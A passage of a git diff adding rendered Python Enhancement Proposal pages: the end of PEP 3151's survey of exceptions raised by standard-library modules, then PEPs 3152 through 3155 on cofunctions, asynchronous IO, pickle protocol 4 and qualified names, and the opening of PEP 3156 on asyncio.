+>>> bz2.BZ2File("/tmp/zzz.bz2", "wb").read()
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: file is not ready for reading
+
+
+
+
+

curses

+

Not examined.

+
+
+

dbm.gnu, dbm.ndbm

+

_dbm.error and _gdbm.error inherit from IOError:

+
>>> dbm.gnu.open("foox")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+_gdbm.error: [Errno 2] No such file or directory
+
+
+
+
+

fcntl

+

Raises IOError throughout (OSError is unused).

+
+
+

imp module

+

Raises IOError for bad file descriptors:

+
>>> imp.load_source("foo", "foo", 123)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: [Errno 9] Bad file descriptor
+
+
+
+
+

io module

+

Raises IOError when trying to open a directory under Unix:

+
>>> open("Python/", "r")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: [Errno 21] Is a directory: 'Python/'
+
+
+

Raises IOError or io.UnsupportedOperation (which inherits from the former) +for unsupported operations:

+
>>> open("LICENSE").write("bar")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: not writable
+>>> io.StringIO().fileno()
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+io.UnsupportedOperation: fileno
+>>> open("LICENSE").seek(1, 1)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: can't do nonzero cur-relative seeks
+
+
+

Raises either IOError or TypeError when the inferior I/O layer misbehaves +(i.e. violates the API it is expected to implement).

+

Raises IOError when the underlying OS resource becomes invalid:

+
>>> f = open("LICENSE")
+>>> os.close(f.fileno())
+>>> f.read()
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: [Errno 9] Bad file descriptor
+
+
+

…or for implementation-specific optimizations:

+
>>> f = open("LICENSE")
+>>> next(f)
+'A. HISTORY OF THE SOFTWARE\n'
+>>> f.tell()
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: telling position disabled by next() call
+
+
+

Raises BlockingIOError (inheriting from IOError) when a call on a non-blocking +object would block.

+
+
+

mmap

+

Under Unix, raises its own mmap.error (inheriting from EnvironmentError) +throughout:

+
>>> mmap.mmap(123, 10)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+mmap.error: [Errno 9] Bad file descriptor
+>>> mmap.mmap(os.open("/tmp", os.O_RDONLY), 10)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+mmap.error: [Errno 13] Permission denied
+
+
+

Under Windows, however, it mostly raises WindowsError (the source code +also shows a few occurrences of mmap.error):

+
>>> fd = os.open("LICENSE", os.O_RDONLY)
+>>> m = mmap.mmap(fd, 16384)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+WindowsError: [Error 5] Accès refusé
+>>> sys.last_value.errno
+13
+>>> errno.errorcode[13]
+'EACCES'
+
+>>> m = mmap.mmap(-1, 4096)
+>>> m.resize(16384)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+WindowsError: [Error 87] Paramètre incorrect
+>>> sys.last_value.errno
+22
+>>> errno.errorcode[22]
+'EINVAL'
+
+
+
+
+

multiprocessing

+

Not examined.

+
+
+

os / posix

+

The os (or posix) module raises OSError throughout, except under +Windows where WindowsError can be raised instead.

+
+
+

ossaudiodev

+

Raises IOError throughout (OSError is unused):

+
>>> ossaudiodev.open("foo", "r")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: [Errno 2] No such file or directory: 'foo'
+
+
+
+
+

readline

+

Raises IOError in various file-handling functions:

+
>>> readline.read_history_file("foo")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: [Errno 2] No such file or directory
+>>> readline.read_init_file("foo")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: [Errno 2] No such file or directory
+>>> readline.write_history_file("/dev/nonexistent")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IOError: [Errno 13] Permission denied
+
+
+
+
+

select

+
    +
  • select() and poll objects raise select.error, which doesn’t inherit from +anything (but poll.modify() raises IOError);
  • +
  • epoll objects raise IOError;
  • +
  • kqueue objects raise both OSError and IOError.
  • +
+

As a side-note, not deriving from EnvironmentError means select.error +does not get the useful errno attribute. User code must check args[0] +instead:

+
>>> signal.alarm(1); select.select([], [], [])
+0
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+select.error: (4, 'Interrupted system call')
+>>> e = sys.last_value
+>>> e
+error(4, 'Interrupted system call')
+>>> e.errno == errno.EINTR
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+AttributeError: 'error' object has no attribute 'errno'
+>>> e.args[0] == errno.EINTR
+True
+
+
+
+
+

signal

+

signal.ItimerError inherits from IOError.

+
+
+

socket

+

socket.error inherits from IOError.

+
+
+

sys

+

sys.getwindowsversion() raises WindowsError with a bogus error number +if the GetVersionEx() call fails.

+
+
+

time

+

Raises IOError for internal errors in time.time() and time.sleep().

+
+
+

zipimport

+

zipimporter.get_data() can raise IOError.

+
+
+
+
+

Acknowledgments

+

Significant input has been received from Alyssa Coghlan.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3151.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3152/index.html b/pep-3152/index.html new file mode 100644 index 00000000000..ef431a2a2e9 --- /dev/null +++ b/pep-3152/index.html @@ -0,0 +1,267 @@ + + + + + + + + PEP 3152 – Cofunctions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3152 – Cofunctions

+
+
Author:
+
Gregory Ewing <greg.ewing at canterbury.ac.nz>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
13-Feb-2009
+
Python-Version:
+
3.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

A syntax is proposed for defining and calling a special type of +generator called a ‘cofunction’. It is designed to provide a +streamlined way of writing generator-based coroutines, and allow the +early detection of certain kinds of error that are easily made when +writing such code, which otherwise tend to cause hard-to-diagnose +symptoms.

+

This proposal builds on the ‘yield from’ mechanism described in PEP +380, and describes some of the semantics of cofunctions in terms of +it. However, it would be possible to define and implement cofunctions +independently of PEP 380 if so desired.

+
+

Rejection

+

See https://mail.python.org/pipermail/python-dev/2015-April/139503.html

+
+
+
+

Specification

+
+

Cofunction definitions

+

A new keyword codef is introduced which is used in place of +def to define a cofunction. A cofunction is a special kind of +generator having the following characteristics:

+
    +
  1. A cofunction is always a generator, even if it does not contain any +yield or yield from expressions.
  2. +
  3. A cofunction cannot be called the same way as an ordinary function. +An exception is raised if an ordinary call to a cofunction is +attempted.
  4. +
+
+
+

Cocalls

+

Calls from one cofunction to another are made by marking the call with +a new keyword cocall. The expression

+
cocall f(*args, **kwds)
+
+
+

is semantically equivalent to

+
yield from f.__cocall__(*args, **kwds)
+
+
+

except that the object returned by __cocall__ is expected to be an +iterator, so the step of calling iter() on it is skipped.

+

The full syntax of a cocall expression is described by the following +grammar lines:

+
atom: cocall | <existing alternatives for atom>
+cocall: 'cocall' atom cotrailer* '(' [arglist] ')'
+cotrailer: '[' subscriptlist ']' | '.' NAME
+
+
+

The cocall keyword is syntactically valid only inside a +cofunction. A SyntaxError will result if it is used in any other +context.

+

Objects which implement __cocall__ are expected to return an object +obeying the iterator protocol. Cofunctions respond to __cocall__ the +same way as ordinary generator functions respond to __call__, i.e. by +returning a generator-iterator.

+

Certain objects that wrap other callable objects, notably bound +methods, will be given __cocall__ implementations that delegate to the +underlying object.

+
+
+

New builtins, attributes and C API functions

+

To facilitate interfacing cofunctions with non-coroutine code, there will +be a built-in function costart whose definition is equivalent to

+
def costart(obj, *args, **kwds):
+    return obj.__cocall__(*args, **kwds)
+
+
+

There will also be a corresponding C API function

+
PyObject *PyObject_CoCall(PyObject *obj, PyObject *args, PyObject *kwds)
+
+
+

It is left unspecified for now whether a cofunction is a distinct type +of object or, like a generator function, is simply a specially-marked +function instance. If the latter, a read-only boolean attribute +__iscofunction__ should be provided to allow testing whether a +given function object is a cofunction.

+
+
+
+

Motivation and Rationale

+

The yield from syntax is reasonably self-explanatory when used for +the purpose of delegating part of the work of a generator to another +function. It can also be used to good effect in the implementation of +generator-based coroutines, but it reads somewhat awkwardly when used +for that purpose, and tends to obscure the true intent of the code.

+

Furthermore, using generators as coroutines is somewhat error-prone. +If one forgets to use yield from when it should have been used, or +uses it when it shouldn’t have, the symptoms that result can be +obscure and confusing.

+

Finally, sometimes there is a need for a function to be a coroutine +even though it does not yield anything, and in these cases it is +necessary to resort to kludges such as if 0: yield to force it to +be a generator.

+

The codef and cocall constructs address the first issue by +making the syntax directly reflect the intent, that is, that the +function forms part of a coroutine.

+

The second issue is addressed by making it impossible to mix coroutine +and non-coroutine code in ways that don’t make sense. If the rules +are violated, an exception is raised that points out exactly what and +where the problem is.

+

Lastly, the need for dummy yields is eliminated by making the form of +definition determine whether the function is a coroutine, rather than +what it contains.

+
+
+

Prototype Implementation

+

An implementation in the form of patches to Python 3.1.2 can be found +here:

+

http://www.cosc.canterbury.ac.nz/greg.ewing/python/generators/cofunctions.html

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3152.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3153/index.html b/pep-3153/index.html new file mode 100644 index 00000000000..0f69eb71d89 --- /dev/null +++ b/pep-3153/index.html @@ -0,0 +1,395 @@ + + + + + + + + PEP 3153 – Asynchronous IO support | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3153 – Asynchronous IO support

+
+
Author:
+
Laurens Van Houtven <_ at lvh.cc>
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
29-May-2011
+
Post-History:
+

+
Superseded-By:
+
3156
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes an abstraction of asynchronous IO for the Python +standard library.

+

The goal is to reach an abstraction that can be implemented by many +different asynchronous IO backends and provides a target for library +developers to write code portable between those different backends.

+
+
+

Rationale

+

People who want to write asynchronous code in Python right now have a +few options:

+
    +
  • asyncore and asynchat
  • +
  • something bespoke, most likely based on the select module
  • +
  • using a third party library, such as Twisted or gevent
  • +
+

Unfortunately, each of these options has its downsides, which this PEP +tries to address.

+

Despite having been part of the Python standard library for a long +time, the asyncore module suffers from fundamental flaws following +from an inflexible API that does not stand up to the expectations of a +modern asynchronous networking module.

+

Moreover, its approach is too simplistic to provide developers with +all the tools they need in order to fully exploit the potential of +asynchronous networking.

+

The most popular solution right now used in production involves the +use of third party libraries. These often provide satisfactory +solutions, but there is a lack of compatibility between these +libraries, which tends to make codebases very tightly coupled to the +library they use.

+

This current lack of portability between different asynchronous IO +libraries causes a lot of duplicated effort for third party library +developers. A sufficiently powerful abstraction could mean that +asynchronous code gets written once, but used everywhere.

+

An eventual added goal would be for standard library implementations +of wire and network protocols to evolve towards being real protocol +implementations, as opposed to standalone libraries that do everything +including calling recv() blockingly. This means they could be +easily reused for both synchronous and asynchronous code.

+
+
+

Communication abstractions

+
+

Transports

+

Transports provide a uniform API for reading bytes from and writing +bytes to different kinds of connections. Transports in this PEP are +always ordered, reliable, bidirectional, stream-oriented two-endpoint +connections. This might be a TCP socket, an SSL connection, a pipe +(named or otherwise), a serial port… It may abstract a file +descriptor on POSIX platforms or a Handle on Windows or some other +data structure appropriate to a particular platform. It encapsulates +all of the particular implementation details of using that platform +data structure and presents a uniform interface for application +developers.

+

Transports talk to two things: the other side of the connection on one +hand, and a protocol on the other. It’s a bridge between the specific +underlying transfer mechanism and the protocol. Its job can be +described as allowing the protocol to just send and receive bytes, +taking care of all of the magic that needs to happen to those bytes to +be eventually sent across the wire.

+

The primary feature of a transport is sending bytes to a protocol and +receiving bytes from the underlying protocol. Writing to the +transport is done using the write and write_sequence methods. +The latter method is a performance optimization, to allow software to +take advantage of specific capabilities in some transport mechanisms. +Specifically, this allows transports to use writev instead of write +or send, also known as scatter/gather IO.

+

A transport can be paused and resumed. This will cause it to buffer +data coming from protocols and stop sending received data to the +protocol.

+

A transport can also be closed, half-closed and aborted. A closed +transport will finish writing all of the data queued in it to the +underlying mechanism, and will then stop reading or writing data. +Aborting a transport stops it, closing the connection without sending +any data that is still queued.

+

Further writes will result in exceptions being thrown. A half-closed +transport may not be written to anymore, but will still accept +incoming data.

+
+
+

Protocols

+

Protocols are probably more familiar to new users. The terminology is +consistent with what you would expect from something called a +protocol: the protocols most people think of first, like HTTP, IRC, +SMTP… are all examples of something that would be implemented in a +protocol.

+

The shortest useful definition of a protocol is a (usually two-way) +bridge between the transport and the rest of the application logic. A +protocol will receive bytes from a transport and translates that +information into some behavior, typically resulting in some method +calls on an object. Similarly, application logic calls some methods +on the protocol, which the protocol translates into bytes and +communicates to the transport.

+

One of the simplest protocols is a line-based protocol, where data is +delimited by \r\n. The protocol will receive bytes from the +transport and buffer them until there is at least one complete line. +Once that’s done, it will pass this line along to some object. +Ideally that would be accomplished using a callable or even a +completely separate object composed by the protocol, but it could also +be implemented by subclassing (as is the case with Twisted’s +LineReceiver). For the other direction, the protocol could have a +write_line method, which adds the required \r\n and passes the +new bytes buffer on to the transport.

+

This PEP suggests a generalized LineReceiver called +ChunkProtocol, where a “chunk” is a message in a stream, delimited +by the specified delimiter. Instances take a delimiter and a callable +that will be called with a chunk of data once it’s received (as +opposed to Twisted’s subclassing behavior). ChunkProtocol also +has a write_chunk method analogous to the write_line method +described above.

+
+
+

Why separate protocols and transports?

+

This separation between protocol and transport often confuses people +who first come across it. In fact, the standard library itself does +not make this distinction in many cases, particularly not in the API +it provides to users.

+

It is nonetheless a very useful distinction. In the worst case, it +simplifies the implementation by clear separation of concerns. +However, it often serves the far more useful purpose of being able to +reuse protocols across different transports.

+

Consider a simple RPC protocol. The same bytes may be transferred +across many different transports, for example pipes or sockets. To +help with this, we separate the protocol out from the transport. The +protocol just reads and writes bytes, and doesn’t really care what +mechanism is used to eventually transfer those bytes.

+

This also allows for protocols to be stacked or nested easily, +allowing for even more code reuse. A common example of this is +JSON-RPC: according to the specification, it can be used across both +sockets and HTTP [1]. In practice, it tends to be primarily +encapsulated in HTTP. The protocol-transport abstraction allows us to +build a stack of protocols and transports that allow you to use HTTP +as if it were a transport. For JSON-RPC, that might get you a stack +somewhat like this:

+
    +
  1. TCP socket transport
  2. +
  3. HTTP protocol
  4. +
  5. HTTP-based transport
  6. +
  7. JSON-RPC protocol
  8. +
  9. Application code
  10. +
+
+
+
+

Flow control

+
+

Consumers

+

Consumers consume bytes produced by producers. Together with +producers, they make flow control possible.

+

Consumers primarily play a passive role in flow control. They get +called whenever a producer has some data available. They then process +that data, and typically yield control back to the producer.

+

Consumers typically implement buffers of some sort. They make flow +control possible by telling their producer about the current status of +those buffers. A consumer can instruct a producer to stop producing +entirely, stop producing temporarily, or resume producing if it has +been told to pause previously.

+

Producers are registered to the consumer using the register +method.

+
+
+

Producers

+

Where consumers consume bytes, producers produce them.

+

Producers are modeled after the IPushProducer interface found in +Twisted. Although there is an IPullProducer as well, it is on the +whole far less interesting and therefore probably out of the scope of +this PEP.

+

Although producers can be told to stop producing entirely, the two +most interesting methods they have are pause and resume. +These are usually called by the consumer, to signify whether it is +ready to process (“consume”) more data or not. Consumers and +producers cooperate to make flow control possible.

+

In addition to the Twisted IPushProducer interface, producers have a +half_register method which is called with the consumer when the +consumer tries to register that producer. In most cases, this will +just be a case of setting self.consumer = consumer, but some +producers may require more complex preconditions or behavior when a +consumer is registered. End-users are not supposed to call this +method directly.

+
+

Considered API alternatives

+
+
Generators as producers
+

Generators have been suggested as way to implement producers. +However, there appear to be a few problems with this.

+

First of all, there is a conceptual problem. A generator, in a sense, +is “passive”. It needs to be told, through a method call, to take +action. A producer is “active”: it initiates those method calls. A +real producer has a symmetric relationship with its consumer. In the +case of a generator-turned-producer, only the consumer would have a +reference, and the producer is blissfully unaware of the consumer’s +existence.

+

This conceptual problem translates into a few technical issues as +well. After a successful write method call on its consumer, a +(push) producer is free to take action once more. In the case of a +generator, it would need to be told, either by asking for the next +object through the iteration protocol (a process which could block +indefinitely), or perhaps by throwing some kind of signal exception +into it.

+

This signaling setup may provide a technically feasible solution, but +it is still unsatisfactory. For one, this introduces unwarranted +complexity in the consumer, which now not only needs to understand how +to receive and process data, but also how to ask for new data and deal +with the case of no new data being available.

+

This latter edge case is particularly problematic. It needs to be +taken care of, since the entire operation is not allowed to block. +However, generators can not raise an exception on iteration without +terminating, thereby losing the state of the generator. As a result, +signaling a lack of available data would have to be done using a +sentinel value, instead of being done using th exception mechanism.

+

Last but not least, nobody produced actually working code +demonstrating how they could be used.

+
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3153.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3154/index.html b/pep-3154/index.html new file mode 100644 index 00000000000..595447e32ae --- /dev/null +++ b/pep-3154/index.html @@ -0,0 +1,385 @@ + + + + + + + + PEP 3154 – Pickle protocol version 4 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3154 – Pickle protocol version 4

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
11-Aug-2011
+
Python-Version:
+
3.4
+
Post-History:
+
12-Aug-2011
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Data serialized using the pickle module must be portable across Python +versions. It should also support the latest language features as well +as implementation-specific features. For this reason, the pickle +module knows about several protocols (currently numbered from 0 to 3), +each of which appeared in a different Python version. Using a +low-numbered protocol version allows to exchange data with old Python +versions, while using a high-numbered protocol allows access to newer +features and sometimes more efficient resource use (both CPU time +required for (de)serializing, and disk size / network bandwidth +required for data transfer).

+
+
+

Rationale

+

The latest current protocol, coincidentally named protocol 3, appeared +with Python 3.0 and supports the new incompatible features in the +language (mainly, unicode strings by default and the new bytes +object). The opportunity was not taken at the time to improve the +protocol in other ways.

+

This PEP is an attempt to foster a number of incremental improvements +in a new pickle protocol version. The PEP process is used in order to +gather as many improvements as possible, because the introduction of a +new pickle protocol should be a rare occurrence.

+
+
+

Proposed changes

+
+

Framing

+

Traditionally, when unpickling an object from a stream (by calling +load() rather than loads()), many small read() +calls can be issued on the file-like object, with a potentially huge +performance impact.

+

Protocol 4, by contrast, features binary framing. The general structure +of a pickle is thus the following:

+
+------+------+
+| 0x80 | 0x04 |              protocol header (2 bytes)
++------+------+
+|  OP  |                     FRAME opcode (1 byte)
++------+------+-----------+
+| MM MM MM MM MM MM MM MM |  frame size (8 bytes, little-endian)
++------+------------------+
+| .... |                     first frame contents (M bytes)
++------+
+|  OP  |                     FRAME opcode (1 byte)
++------+------+-----------+
+| NN NN NN NN NN NN NN NN |  frame size (8 bytes, little-endian)
++------+------------------+
+| .... |                     second frame contents (N bytes)
++------+
+  etc.
+
+
+

To keep the implementation simple, it is forbidden for a pickle opcode +to straddle frame boundaries. The pickler takes care not to produce such +pickles, and the unpickler refuses them. Also, there is no “last frame” +marker. The last frame is simply the one which ends with a STOP opcode.

+

A well-written C implementation doesn’t need additional memory copies +for the framing layer, preserving general (un)pickling efficiency.

+
+

Note

+

How the pickler decides to partition the pickle stream into frames is an +implementation detail. For example, “closing” a frame as soon as it +reaches ~64 KiB is a reasonable choice for both performance and pickle +size overhead.

+
+
+
+

Binary encoding for all opcodes

+

The GLOBAL opcode, which is still used in protocol 3, uses the +so-called “text” mode of the pickle protocol, which involves looking +for newlines in the pickle stream. It also complicates the implementation +of binary framing.

+

Protocol 4 forbids use of the GLOBAL opcode and replaces it with +STACK_GLOBAL, a new opcode which takes its operand from the stack.

+
+
+

Serializing more “lookupable” objects

+

By default, pickle is only able to serialize module-global functions and +classes. Supporting other kinds of objects, such as unbound methods [4], +is a common request. Actually, third-party support for some of them, such +as bound methods, is implemented in the multiprocessing module [5].

+

The __qualname__ attribute from PEP 3155 makes it possible to +lookup many more objects by name. Making the STACK_GLOBAL opcode accept +dot-separated names would allow the standard pickle implementation to +support all those kinds of objects.

+
+
+

64-bit opcodes for large objects

+

Current protocol versions export object sizes for various built-in +types (str, bytes) as 32-bit ints. This forbids serialization of +large data [1]. New opcodes are required to support very large bytes +and str objects.

+
+
+

Native opcodes for sets and frozensets

+

Many common built-in types (such as str, bytes, dict, list, tuple) +have dedicated opcodes to improve resource consumption when +serializing and deserializing them; however, sets and frozensets +don’t. Adding such opcodes would be an obvious improvement. Also, +dedicated set support could help remove the current impossibility of +pickling self-referential sets [2].

+
+
+

Calling __new__ with keyword arguments

+

Currently, classes whose __new__ mandates the use of keyword-only +arguments can not be pickled (or, rather, unpickled) [3]. Both a new +special method (__getnewargs_ex__) and a new opcode (NEWOBJ_EX) +are needed. The __getnewargs_ex__ method, if it exists, must +return a two-tuple (args, kwargs) where the first item is the +tuple of positional arguments and the second item is the dict of +keyword arguments for the class’s __new__ method.

+
+
+

Better string encoding

+

Short str objects currently have their length coded as a 4-bytes +integer, which is wasteful. A specific opcode with a 1-byte length +would make many pickles smaller.

+
+
+

Smaller memoization

+

The PUT opcodes all require an explicit index to select in which entry +of the memo dictionary the top-of-stack is memoized. However, in practice +those numbers are allocated in sequential order. A new opcode, MEMOIZE, +will instead store the top-of-stack in at the index equal to the current +size of the memo dictionary. This allows for shorter pickles, since PUT +opcodes are emitted for all non-atomic datatypes.

+
+
+
+

Summary of new opcodes

+

These reflect the state of the proposed implementation (thanks mostly +to Alexandre Vassalotti’s work):

+
    +
  • FRAME: introduce a new frame (followed by the 8-byte frame size +and the frame contents).
  • +
  • SHORT_BINUNICODE: push a utf8-encoded str object with a one-byte +size prefix (therefore less than 256 bytes long).
  • +
  • BINUNICODE8: push a utf8-encoded str object with an eight-byte +size prefix (for strings longer than 2**32 bytes, which therefore cannot +be serialized using BINUNICODE).
  • +
  • BINBYTES8: push a bytes object with an eight-byte size prefix +(for bytes objects longer than 2**32 bytes, which therefore cannot be +serialized using BINBYTES).
  • +
  • EMPTY_SET: push a new empty set object on the stack.
  • +
  • ADDITEMS: add the topmost stack items to the set (to be used with +EMPTY_SET).
  • +
  • FROZENSET: create a frozenset object from the topmost stack items, +and push it on the stack.
  • +
  • NEWOBJ_EX: take the three topmost stack items cls, args +and kwargs, and push the result of calling +cls.__new__(*args, **kwargs).
  • +
  • STACK_GLOBAL: take the two topmost stack items module_name and +qualname, and push the result of looking up the dotted qualname +in the module named module_name.
  • +
  • MEMOIZE: store the top-of-stack object in the memo dictionary with +an index equal to the current size of the memo dictionary.
  • +
+
+
+

Alternative ideas

+
+

Prefetching

+

Serhiy Storchaka suggested to replace framing with a special PREFETCH +opcode (with a 2- or 4-bytes argument) to declare known pickle chunks +explicitly. Large data may be pickled outside such chunks. A naïve +unpickler should be able to skip the PREFETCH opcode and still decode +pickles properly, but good error handling would require checking that +the PREFETCH length falls on an opcode boundary.

+
+
+
+

Acknowledgments

+

In alphabetic order:

+
    +
  • Alexandre Vassalotti, for starting the second PEP 3154 implementation [6]
  • +
  • Serhiy Storchaka, for discussing the framing proposal [6]
  • +
  • Stefan Mihaila, for starting the first PEP 3154 implementation as a +Google Summer of Code project mentored by Alexandre Vassalotti [7].
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3154.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3155/index.html b/pep-3155/index.html new file mode 100644 index 00000000000..cb5004c4c38 --- /dev/null +++ b/pep-3155/index.html @@ -0,0 +1,292 @@ + + + + + + + + PEP 3155 – Qualified name for classes and functions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3155 – Qualified name for classes and functions

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
29-Oct-2011
+
Python-Version:
+
3.3
+
Post-History:
+

+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Rationale

+

Python’s introspection facilities have long had poor support for +nested classes. Given a class object, it is impossible to know +whether it was defined inside another class or at module top-level; +and, if the former, it is also impossible to know in which class it +was defined. While use of nested classes is often considered poor +style, the only reason for them to have second class introspection +support is a lousy pun.

+

Python 3 adds insult to injury by dropping what was formerly known as +unbound methods. In Python 2, given the following definition:

+
class C:
+    def f():
+        pass
+
+
+

you can then walk up from the C.f object to its defining class:

+
>>> C.f.im_class
+<class '__main__.C'>
+
+
+

This possibility is gone in Python 3:

+
>>> C.f.im_class
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+AttributeError: 'function' object has no attribute 'im_class'
+>>> dir(C.f)
+['__annotations__', '__call__', '__class__', '__closure__', '__code__',
+'__defaults__', '__delattr__', '__dict__', '__dir__', '__doc__',
+'__eq__', '__format__', '__ge__', '__get__', '__getattribute__',
+'__globals__', '__gt__', '__hash__', '__init__', '__kwdefaults__',
+'__le__', '__lt__', '__module__', '__name__', '__ne__', '__new__',
+'__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__',
+'__str__', '__subclasshook__']
+
+
+

This limits again the introspection capabilities available to the +user. It can produce actual issues when porting software to Python 3, +for example Twisted Core where the issue of introspecting method +objects came up several times. It also limits pickling support [1].

+
+
+

Proposal

+

This PEP proposes the addition of a __qualname__ attribute to +functions and classes. For top-level functions and classes, the +__qualname__ attribute is equal to the __name__ attribute. For +nested classes, methods, and nested functions, the __qualname__ +attribute contains a dotted path leading to the object from the module +top-level. A function’s local namespace is represented in that dotted +path by a component named <locals>.

+

The repr() and str() of functions and classes is modified to use +__qualname__ rather than __name__.

+
+

Example with nested classes

+
>>> class C:
+...   def f(): pass
+...   class D:
+...     def g(): pass
+...
+>>> C.__qualname__
+'C'
+>>> C.f.__qualname__
+'C.f'
+>>> C.D.__qualname__
+'C.D'
+>>> C.D.g.__qualname__
+'C.D.g'
+
+
+
+
+

Example with nested functions

+
>>> def f():
+...   def g(): pass
+...   return g
+...
+>>> f.__qualname__
+'f'
+>>> f().__qualname__
+'f.<locals>.g'
+
+
+
+
+
+

Limitations

+

With nested functions (and classes defined inside functions), the +dotted path will not be walkable programmatically as a function’s +namespace is not available from the outside. It will still be more +helpful to the human reader than the bare __name__.

+

As the __name__ attribute, the __qualname__ attribute is computed +statically and it will not automatically follow rebinding.

+
+
+

Discussion

+
+

Excluding the module name

+

As __name__, __qualname__ doesn’t include the module name. This +makes it independent of module aliasing and rebinding, and also allows to +compute it at compile time.

+
+
+

Reviving unbound methods

+

Reviving unbound methods would only solve a fraction of the problems this +PEP solves, at a higher price (an additional object type and an additional +indirection, rather than an additional attribute).

+
+
+
+

Naming choice

+

“Qualified name” is the best approximation, as a short phrase, of what the +additional attribute is about. It is not a “full name” or “fully qualified +name” since it (deliberately) does not include the module name. Calling +it a “path” would risk confusion with filesystem paths and the __file__ +attribute.

+

The first proposal for the attribute name was to call it __qname__ but +many people (who are not aware of previous use of such jargon in e.g. the +XML specification [2]) found it obscure and non-obvious, which is why the +slightly less short and more explicit __qualname__ was finally chosen.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3155.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3156/index.html b/pep-3156/index.html new file mode 100644 index 00000000000..a0b33c07d6a --- /dev/null +++ b/pep-3156/index.html @@ -0,0 +1,2124 @@ + + + + + + + + PEP 3156 – Asynchronous IO Support Rebooted: the “asyncio” Module | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3156 – Asynchronous IO Support Rebooted: the “asyncio” Module

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
BDFL-Delegate:
+
Antoine Pitrou <antoine at python.org>
+
Discussions-To:
+
python-tulip@googlegroups.com
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Dec-2012
+
Python-Version:
+
3.3
+
Post-History:
+
21-Dec-2012
+
Replaces:
+
3153
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This is a proposal for asynchronous I/O in Python 3, starting at +Python 3.3. Consider this the concrete proposal that is missing from +PEP 3153. The proposal includes a pluggable event loop, transport and +protocol abstractions similar to those in Twisted, and a higher-level +scheduler based on yield from (PEP 380). The proposed package +name is asyncio.

+
+
+

Introduction

+
+

Status

+

A reference implementation exists under the code name Tulip. The +Tulip repo is linked from the References section at the end. Packages +based on this repo will be provided on PyPI (see References) to enable +using the asyncio package with Python 3.3 installations.

+

